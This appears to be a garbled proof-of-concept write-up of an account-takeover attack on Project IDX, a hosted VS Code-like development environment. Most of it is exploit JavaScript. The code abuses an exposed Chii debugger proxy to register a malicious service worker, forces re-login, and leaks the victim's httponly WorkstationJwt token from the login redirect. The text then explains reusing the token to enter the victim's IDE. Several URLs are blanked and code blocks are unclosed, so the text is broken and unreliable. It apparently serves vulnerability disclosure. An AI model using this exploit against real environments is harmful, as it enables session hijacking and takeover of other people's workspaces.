This is a hosted development environment called Project IDX based on Visual Studio Code like Google Cloud Shell
Feature being abused:
Its based of the Chii open source project:
from an iframe in the format https://9000-monospace-<ID>
(In a real attack this could be leaked from the network)ID
with your own ID.// Vulnerable debugger proxy (Runs any js code you want, Fetch as the victims server)
let target = 'https://8282-monospace-<ID>';
// Link to our service worker
let proxy = new URL('');
proxy.searchParams.set('ct', 'application/javascript');
proxyPayload = `
self.addEventListener("fetch", (event) => {
let url = event.request.url;
// Leak token from redirect since its a httponly cookie
// Authentication is done by:
// Redirecting the user to<value> (Cross-site, COOP, embed protection)
// https://<PORT>-idx-<ID><value> this sets a cookie then redirects back.
if (url.includes("_workstation/login")) {'🎉 Leaked token: '+url);
proxy.searchParams.set('html', proxyPayload);
// Link to force a re-authenticate
let reauth = new URL('');
reauth.searchParams.set('h[Clear-Site-Data]', '"cookies"');
reauthPayload = `
setTimeout(() => { location.href=location.origin }, 3000);
reauth.searchParams.set('js', reauthPayload);
// Link to create service worker
let setup = new URL('');
setupPayload = `
navigator.serviceWorker.register("${target + encodeURIComponent(proxy.href)}");
setTimeout(() => { location.href="${target + encodeURIComponent(reauth.href)}" }, 3000);
setup.searchParams.set('js', setupPayload);
// Do the stuff
location = target + encodeURIComponent(setup.href);
in a new browser go to that URL and you will be logged in to the debugger.WorkstaionJwt
from that by changing the domain of this cookie for example to 80-monospace-<ID>
you can login to the IDE!